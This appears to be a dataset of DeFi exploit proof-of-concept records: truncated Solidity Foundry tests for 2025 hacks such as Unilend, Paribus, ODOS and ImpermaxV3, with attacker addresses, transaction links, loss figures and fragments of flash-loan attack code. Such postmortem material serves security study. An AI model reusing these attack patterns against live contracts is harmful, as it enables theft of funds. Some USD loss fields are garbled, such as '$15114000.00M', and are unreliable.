// Vulnerable Cont... | exploit_poc | Mosca2 | 2025-01 | Mosca2_exp.sol | flash_loan | 24cfab6d0530ce6c | 2026-01-07T10:59:16.544331 | postmortems | bsc | null | 37.6K | 37,600 | https://bscscan.com/address/0xe763da20e25103da8e6afa84b6297f87de557419 | https://bscscan.com/address/0xedcfa34e275120e7d18edbbb0a6171d8ad3ccf54 | https://bscscan.com/address/0xd8791f0c10b831b605c5d48959eb763b266940b9 | https://bscscan.com/tx/0xf13d281d4aa95f1aca457bd17f2531581b0ce918c90905d65934c9e67f6ae0ec | null | null | true | true | true | medium | 37.6K | flash-loan | function testExploit() public balanceLog {
uint256 baseAmount = 0;
uint256 quoteAmonut = 7_000_000_000_000_000_000_000;
address assetTo = address(this);
bytes memory data = abi.encode("0xdead");
IDODO(DPP).flashLoan(baseAmount, quoteAmonut, assetTo, data);
} | true | 37.6K | https://bscscan.com/address/0xe763da20e25103da8e6afa84b6297f87de557419 | https://bscscan.com/address/0xedcfa34e275120e7d18edbbb0a6171d8ad3ccf54 | https://bscscan.com/address/0xd8791f0c10b831b605c5d48959eb763b266940b9 | https://bscscan.com/tx/0xf13d281d4aa95f1aca457bd17f2531581b0ce918c90905d65934c9e67f6ae0ec | $37.6K | 8.44 | high | Mosca2 Exploit (2025-01) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 14.8 WBNB
// Attacker : https://bscscan.com/address/0x8Efb9311700439d70025d2B372fb54c61a60d5DF
// Attack Contract : https://bscscan.com/address/0x75ff620FF0e63243e86b99510cDb... | exploit_poc | HORS | 2025-01 | HORS_exp.sol | null | a2e53da1afb97ddf | 2026-01-07T10:59:16.544380 | postmortems | bsc | null | 14.8 WBNB | 14.8 | https://bscscan.com/address/0x8Efb9311700439d70025d2B372fb54c61a60d5DF | https://bscscan.com/address/0x75ff620FF0e63243e86b99510cDbaD1D5e76524E | https://bscscan.com/address/0x6f3390c6C200e9bE81b32110CE191a293dc0eaba | https://bscscan.com/tx/0xc8572846ed313b12bf835e2748ff37dacf6b8ee1bab36972dc4ace5e9f25fed7 | null | https://x.com/TenArmorAlert/status/1877032470098428058 | true | true | false | low | 14.8 WBNB | unknown | function testExploit() public balanceLog {
//implement exploit code here
AttackContract attackContract = new AttackContract();
attackContract.attack();
}
}
contract AttackContract {
address public attacker;
constructor() {
attacker = msg.sender;
} | true | 14.8 WBNB | https://bscscan.com/address/0x8Efb9311700439d70025d2B372fb54c61a60d5DF | https://bscscan.com/address/0x75ff620FF0e63243e86b99510cDbaD1D5e76524E | https://bscscan.com/address/0x6f3390c6C200e9bE81b32110CE191a293dc0eaba | https://bscscan.com/tx/0xc8572846ed313b12bf835e2748ff37dacf6b8ee1bab36972dc4ace5e9f25fed7 | https://x.com/TenArmorAlert/status/1877032470098428058 | $15 | 7.8 | medium | HORS Exploit (2025-01) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// reason : To pump the price ,every sell will burn pairs token, that is terrible!
// guy : https://x.com/TenArmorAlert/status/1876663900663370056
// tx : https://app.blocksec.com/explorer/tx... | exploit_poc | IPC | 2025-01 | IPC_exp.sol | flash_loan | 2c98998c2dd63f7b | 2026-01-07T10:59:16.544443 | postmortems | unknown | 45,561,316 | null | null | null | null | null | null | null | null | false | false | true | medium | null | flash-loan | false | Unknown | 3.14 | low | IPC Exploit (2025-01) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// reason : Unprotected public function
// guy : https://x.com/TenArmorAlert/status/1875462686353363435
// tx : https://app.blocksec.com/explorer/tx/bsc/0x61da5b502a62d7e9038d73e31ceb39350504... | exploit_poc | 98Token | 2025-01 | 98Token_exp.sol | null | ef40858e32b7da3e | 2026-01-07T10:59:16.544500 | postmortems | unknown | 45,462,898 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | false | Unknown | 1.07 | low | 98Token Exploit (2025-01) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 60 stETH
// Attacker : https://etherscan.io/address/0x55f5f8058816d5376df310770ca3a2e294089c33
// Attack Contract : https://etherscan.io/address/0x3f814e5fae74cd73a70a0ea38d8... | exploit_poc | Unilend | 2025-01 | Unilend_exp.sol | flash_loan | 982262718d714417 | 2026-01-07T10:59:16.544546 | postmortems | ethereum | null | 60 stETH | 60 | https://etherscan.io/address/0x55f5f8058816d5376df310770ca3a2e294089c33 | https://etherscan.io/address/0x3f814e5fae74cd73a70a0ea38d85971dfa6fda21 | https://etherscan.io/address/0x4e34dd25dbd367b1bf82e1b5527dbbe799fad0d0 | https://etherscan.io/tx/0x44037ffc0993327176975e08789b71c1058318f48ddeff25890a577d6555b6ba | https://slowmist.medium.com/analysis-of-the-unilend-hack-90022fa35a54 | https://x.com/SlowMist_Team/status/1878651772375572573 | true | true | true | low | 60 stETH | flash-loan | function testExploit() public balanceLog {
// Step 1: attacker pledged 200 USDC to the UnilendV2Pool
// https://app.blocksec.com/explorer/tx/eth/0xdaf42127499f878b62fc5ba2103135de1c36e1646487cee309c077296814f5ff
// Step 2: transfer the 150,237,398 USDC lendShares to the attack contract
... | true | 60 stETH | https://etherscan.io/address/0x55f5f8058816d5376df310770ca3a2e294089c33 | https://etherscan.io/address/0x3f814e5fae74cd73a70a0ea38d85971dfa6fda21 | https://etherscan.io/address/0x4e34dd25dbd367b1bf82e1b5527dbbe799fad0d0 | https://etherscan.io/tx/0x44037ffc0993327176975e08789b71c1058318f48ddeff25890a577d6555b6ba | https://slowmist.medium.com/analysis-of-the-unilend-hack-90022fa35a54 | https://x.com/SlowMist_Team/status/1878651772375572573 | $60 | 10 | high | Unilend Exploit (2025-01) | true | true | true | true |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "./../basetest.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~86k
// Attacker : https://arbiscan.io/address/0x56190CAC88b8D4b5D5Ed668ef81828913932e7Ed
// Attack Contract : https://arbiscan.io/tx/0x43aa42d2f11afe42832a9619bc8066dfb8... | exploit_poc | Paribus | 2025-01 | Paribus_exp.sol | flash_loan | abff26ba6e9c4178 | 2026-01-07T10:59:16.544613 | postmortems | arbitrum | null | ~86k | 86,000 | https://arbiscan.io/address/0x56190CAC88b8D4b5D5Ed668ef81828913932e7Ed | https://arbiscan.io/tx/0x43aa42d2f11afe42832a9619bc8066dfb83a921798b91eaf9d0345dd27dcfb06 | https://arbiscan.io/address/0xaffd437801434643b734d0b2853654876f66f7d7 | https://arbiscan.io/tx/0xf5e753d3da60db214f2261343c1e1bc46e674d2fa4b7a953eaf3c52123aeebd2 | https://bitfinding.com/blog/paribus-hack-interception | https://x.com/BitFinding/status/1882880682512527516 | true | true | true | medium | ~86k | flash-loan | function testExploit() public {
emit log_named_decimal_uint("Exploiter ETH balance before attack", address(this).balance, 18);
emit log_named_decimal_uint("Exploiter USDT balance before attack", USDT.balanceOf(address(this)), 6);
emit log_named_decimal_uint("Exploiter ARB_DAO balance before atta... | true | ~86k | https://arbiscan.io/address/0x56190CAC88b8D4b5D5Ed668ef81828913932e7Ed | https://arbiscan.io/tx/0x43aa42d2f11afe42832a9619bc8066dfb83a921798b91eaf9d0345dd27dcfb06 | https://arbiscan.io/address/0xaffd437801434643b734d0b2853654876f66f7d7 | https://arbiscan.io/tx/0xf5e753d3da60db214f2261343c1e1bc46e674d2fa4b7a953eaf3c52123aeebd2 | https://bitfinding.com/blog/paribus-hack-interception | https://x.com/BitFinding/status/1882880682512527516 | $86.0K | 10 | high | Paribus Exploit (2025-01) | true | true | true | true |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~50k
// Attacker : https://basescan.org/address/0x4015d786e33c1842c3e4d27792098e4a3612fc0e
// Attack Contract : https://basescan.org/address/0x22a7da241a39f189a8aec269a6... | exploit_poc | ODOS | 2025-01 | ODOS_exp.sol | null | d323862e91c280ec | 2026-01-07T10:59:16.544678 | postmortems | base | 25,431,001 | ~50k | 50,000 | https://basescan.org/address/0x4015d786e33c1842c3e4d27792098e4a3612fc0e | https://basescan.org/address/0x22a7da241a39f189a8aec269a6f11a238b6086fc | https://basescan.org/address/0xb6333e994fd02a9255e794c177efbdeb1fe779c7 | https://basescan.org/tx/0xd10faa5b33ddb501b1dc6430896c966048271f2510ff9ed681dd6d510c5df9f6 | null | https://x.com/Phalcon_xyz/status/1882630151583981787 | true | true | false | medium | ~50k | unknown | function testExploit() public {
emit log_named_decimal_uint(
"[Start] Attacker USDC balance before exploit",
USDCInstance.balanceOf(address(this)),
6
);
uint256 victimUSDCBalance = USDCInstance.balanceOf(address(odosLimitOrderRouterInstance));
bytes ... | true | ~50k | https://basescan.org/address/0x4015d786e33c1842c3e4d27792098e4a3612fc0e | https://basescan.org/address/0x22a7da241a39f189a8aec269a6f11a238b6086fc | https://basescan.org/address/0xb6333e994fd02a9255e794c177efbdeb1fe779c7 | https://basescan.org/tx/0xd10faa5b33ddb501b1dc6430896c966048271f2510ff9ed681dd6d510c5df9f6 | https://x.com/Phalcon_xyz/status/1882630151583981787 | $50.0K | 7.22 | medium | ODOS Exploit (2025-01) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 15114 BUSD
// Attacker : https://bscscan.com/address/0x3026C464d3Bd6Ef0CeD0D49e80f171b58176Ce32
// Attack Contract : https://bscscan.com/address/0xF6Cee497DFE95A04FAa26F31... | exploit_poc | Lifeprotocol | 2025-04 | Lifeprotocol_exp.sol | flash_loan | a8b6ee30aa04031b | 2026-01-07T10:59:16.544722 | postmortems | bsc | 48,703,546 | 15114 BUSD | 15,114,000,000,000 | https://bscscan.com/address/0x3026C464d3Bd6Ef0CeD0D49e80f171b58176Ce32 | https://bscscan.com/address/0xF6Cee497DFE95A04FAa26F3138F9244a4d92f942 | https://bscscan.com/address/0x42e2773508e2ae8ff9434bea599812e28449e2cd | https://bscscan.com/tx/0x487fb71e3d2574e747c67a45971ec3966d275d0069d4f9da6d43901401f8f3c0 | null | null | true | true | true | critical | 15114 BUSD | flash-loan | function testExploit() public {
IFS(dpp).flashLoan(0, quoteAmount, address(this), abi.encodePacked(uint256(1)));
console2.log("Profit:", IFS(busd).balanceOf(address(this)) / 1e18, 'BUSD');
} | true | 15114 BUSD | https://bscscan.com/address/0x3026C464d3Bd6Ef0CeD0D49e80f171b58176Ce32 | https://bscscan.com/address/0xF6Cee497DFE95A04FAa26F3138F9244a4d92f942 | https://bscscan.com/address/0x42e2773508e2ae8ff9434bea599812e28449e2cd | https://bscscan.com/tx/0x487fb71e3d2574e747c67a45971ec3966d275d0069d4f9da6d43901401f8f3c0 | $15114000.00M | 8.16 | high | Lifeprotocol Exploit (2025-04) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 15261.68240413121964707 BUSD
// Original Attacker : https://bscscan.com/address/0x00000000b7da455fed1553c4639c4b29983d8538
// Attack Contract(Main) : https://bscscan.com/a... | exploit_poc | YBToken | 2025-04 | YBToken_exp.sol | null | 500e3aaa947c8cd8 | 2026-01-07T10:59:16.544773 | postmortems | bsc | 48,415,276 | 15261.68240413121964707 BUSD | 15,261,682,404,131.219 | https://bscscan.com/address/0x00000000b7da455fed1553c4639c4b29983d8538 | null | https://bscscan.com/address/0x113F16A3341D32c4a38Ca207Ec6ab109cF63e434 | https://bscscan.com/tx/0xe1e7fa81c3761e2698aa83e084f7dd4a1ff907bcfc4a612d54d92175d4e8a28b | null | null | true | false | false | critical | 15261.68240413121964707 BUSD | unknown | function testPoC() public {
vm.startPrank(attacker);
AttackerC attC = new AttackerC();
attC.attack();
console2.log("Profit:", IERC20(BUSD).balanceOf(attacker) / 1e18, 'BUSD');
}
}
contract AttackerC {
uint256 loanAmount = 19200000000000000000000; // Magic number
u... | true | 15261.68240413121964707 BUSD | https://bscscan.com/address/0x00000000b7da455fed1553c4639c4b29983d8538 | https://bscscan.com/address/0x113F16A3341D32c4a38Ca207Ec6ab109cF63e434 | https://bscscan.com/tx/0xe1e7fa81c3761e2698aa83e084f7dd4a1ff907bcfc4a612d54d92175d4e8a28b | $15261682.40M | 8.09 | high | YBToken Exploit (2025-04) | true | true | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 19025.9193312786235214 BUSD
// Original Attacker : https://bscscan.com/address/0xbda2a27cdb2ffd4258f3b1ed664ed0f28f9e0fc3
// Attack Contract : https://bscscan.com/address/... | exploit_poc | BTNFT | 2025-04 | BTNFT_exp.sol | null | 5ab03187e8f7cd49 | 2026-01-07T10:59:16.544825 | postmortems | bsc | 48,472,356 | 19025.9193312786235214 BUSD | 19,025,919,331,278.62 | https://bscscan.com/address/0xbda2a27cdb2ffd4258f3b1ed664ed0f28f9e0fc3 | https://bscscan.com/address/0x7A4D144307d2DFA2885887368E4cd4678dB3c27a | https://bscscan.com/address/0x0FC91B6Fea2E7A827a8C99C91101ed36c638521B#code | null | null | null | true | false | false | critical | 19025.9193312786235214 BUSD | unknown | function testPoC() public {
vm.startPrank(attacker);
AttackerC attC = new AttackerC();
attC.attackTx1();
attC.attackTx2();
emit log_named_decimal_uint("Profit in BUSD", IERC20(BUSD).balanceOf(attacker), 18);
}
}
contract AttackerC { | true | 19025.9193312786235214 BUSD | https://bscscan.com/address/0xbda2a27cdb2ffd4258f3b1ed664ed0f28f9e0fc3 | https://bscscan.com/address/0x7A4D144307d2DFA2885887368E4cd4678dB3c27a | https://bscscan.com/address/0x0FC91B6Fea2E7A827a8C99C91101ed36c638521B#code | $19025919.33M | 6.27 | medium | BTNFT Exploit (2025-04) | true | true | false | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ~300k
// 26th April, 2025, at 10:43 UTC
// Attacker : https://basescan.org/address/0xe3223f7e3343c2c8079f261d59ee1e513086c7c3
// Attack Contract : https://basescan.org/add... | exploit_poc | ImpermaxV3 | 2025-04 | ImpermaxV3_exp.sol | flash_loan | ba5c330f5c51b6c1 | 2026-01-07T10:59:16.544875 | postmortems | base | 29,437,439 | ~300k | 300,000 | https://basescan.org/address/0xe3223f7e3343c2c8079f261d59ee1e513086c7c3 | https://basescan.org/address/0x98e938899902217465f17cf0b76d12b3dca8ce1b | https://basescan.org/address/0x5d93f216f17c225a8b5ffa34e74b7133436281ee | https://basescan.org/tx/0xde903046b5cdf27a5391b771f41e645e9cc670b649f7b87b1524fc4076f45983 | null | null | true | false | true | high | ~300k | flash-loan | function testExploit() public {
IFS(Morpho).flashLoan(WETH_address, borrowWETH_amount, abi.encodePacked(uint256(1)));
console2.log("WETH balance: ", IFS(WETH_address).balanceOf(address(this)));
console2.log("USDC balance: ", IFS(USDC_address).balanceOf(address(this)));
}
bool private in... | true | ~300k | https://basescan.org/address/0xe3223f7e3343c2c8079f261d59ee1e513086c7c3 | https://basescan.org/address/0x98e938899902217465f17cf0b76d12b3dca8ce1b | https://basescan.org/address/0x5d93f216f17c225a8b5ffa34e74b7133436281ee | https://basescan.org/tx/0xde903046b5cdf27a5391b771f41e645e9cc670b649f7b87b1524fc4076f45983 | $300.0K | 10 | high | ImpermaxV3 Exploit (2025-04) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ~ ($62.3K)
// Attacker : https://basescan.org/address/0x780e5cb8de79846f35541b700637057c9ddded68
// Attack Contract : https://basescan.org/address/0x780e5cb8de79846f35541b700... | exploit_poc | Unverified_6077 | 2025-04 | Unverified_6077_exp.sol | null | 0c32819ecc29bf6e | 2026-01-07T10:59:16.544956 | postmortems | base | null | ~ ($62.3K) | 62,300 | https://basescan.org/address/0x780e5cb8de79846f35541b700637057c9ddded68 | https://basescan.org/address/0x780e5cb8de79846f35541b700637057c9ddded68 | https://basescan.org/address/0x607742a2adea4037020e11bb67cb98e289e3ec7d | https://basescan.org/tx/0x1a6002d8aee205dff67cb2cdaf60569721655857d49ffe2ce81e10fde8c45946 | null | https://x.com/TenArmorAlert/status/1910662533607796887 | true | true | false | medium | ~ ($62.3K) | unknown | function testExploit() public {
AttackContract attackContract = new AttackContract();
attackContract.start();
AttackContract2 attackContract2 = new AttackContract2();
attackContract2.start();
emit log_named_decimal_uint("WETH", TokenHelper.getTokenBalance(WETH_ADDR, address(this... | true | ~ ($62.3K) | https://basescan.org/address/0x780e5cb8de79846f35541b700637057c9ddded68 | https://basescan.org/address/0x780e5cb8de79846f35541b700637057c9ddded68 | https://basescan.org/address/0x607742a2adea4037020e11bb67cb98e289e3ec7d | https://basescan.org/tx/0x1a6002d8aee205dff67cb2cdaf60569721655857d49ffe2ce81e10fde8c45946 | https://x.com/TenArmorAlert/status/1910662533607796887 | $62.3K | 7.69 | medium | Unverified_6077 Exploit (2025-04) | true | true | true | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.